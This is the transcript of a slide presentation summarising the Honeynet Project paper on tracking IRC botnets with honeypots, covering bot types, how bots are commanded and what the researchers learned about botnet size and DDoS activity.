Know your Enemy: Tracking Botnets
21
Know your Enemy: Tracking Botnets The Honeynet Project & Research Alliance Presented by: Jonathan Dowdle
description
Know your Enemy: Tracking Botnets. The Honeynet Project & Research Alliance Presented by: Jonathan Dowdle. Motivation. To study the activities of BotNets and their owners. What a Botnet is Not. Introduction. What is a BotNet? What is a HoneyNet? Who are the victims? - PowerPoint PPT Presentation
Transcript of Know your Enemy: Tracking Botnets
Know your Enemy: Tracking Botnets
The Honeynet Project & Research Alliance
Presented by: Jonathan Dowdle
Motivation
• To study the activities of BotNets and their owners
What a Botnet is Not
Introduction
• What is a BotNet?
• What is a HoneyNet?
• Who are the victims?
• What vulnerabilities are used?
• What can a BotNet be used for?
HoneyNet
LAN
Internet
Honeywall
Management
`
Windows Honeypots
``
``
BotNet
bot
bot
`
bot
`
bot
`
bot
`
botInternet
IRC Server
Method
• Setup – HoneyNet of 3 machines
• Analysis– mwcollectd2– drone
Uses of Botnets
• DDoS (Distributed Denial of Service) Attack• Spamming• Sniffing Traffic• Keylogging• Spreading Malware• Google AdSense Abuse• Attacking IRC Networks (similar to DDoS)• Manipulating online polls/games• Mass identity theft
Types of Bots
• Most common bots– Agobot / Phatbot / Forbot / XtremBot– SDBot / RBot / UrBot / UrXBot– GT-Bots
• Less common bots– DSNX Bots– Q8 Bots– kaiten– Perl-based bots
How Bots Work
FTPTFTPHTTP
INTERNET
Exploited Client
Master IRC ServerExploited Client
w/ Bot client
Bot is downloaded from
Internet
Bot connects to IRC server
How Bots WorkStart
Join IRC Server
Join master’s channel
Topic a command?
Execute commandYES Output?
NO
NO
YESMessage master
The Server
• Unreal IRCd
• ConferenceRoom
HoneyNet
LAN
Internet
Honeywall
Management
`
Windows Honeypots
``
``
Tracking Botnets
• IRC login information is sniffed when bot on Honeypot connects
• Using login information gathered we can connect to master IRC server
Tracking Botnets -- Observing
• Commands from master can be observed in channel
• Custom IRC client is usually needed
Custom IRC Client
• drone
Lessons Learned
• Number of botnets– 100 botnets over 4 months– 35 “live” botnets as of paper’s publish date
• Number of hosts– ~220,000 unique IP addresses joining at least
one of the monitored channels• The number may be larger due to some hosts not
showing joining clients into a channel
Lessons Learned Cont.
• Typical Size of Botnets– 100s – up to 50,000 hosts
• Dimension of DDoS-attacks– 226 DDoS-attacks against 99 unique targets
Strengths
• Moderate learning curve– Paper is presented in ordinary language
• Novel method of determining methods and attacks used by Botnet owners
Weaknesses
• Focuses only IRC-based bots
• More data could have been provided
Further Research
• Vulnerability modules
• Shellcode parsing modules
• Fetch modules
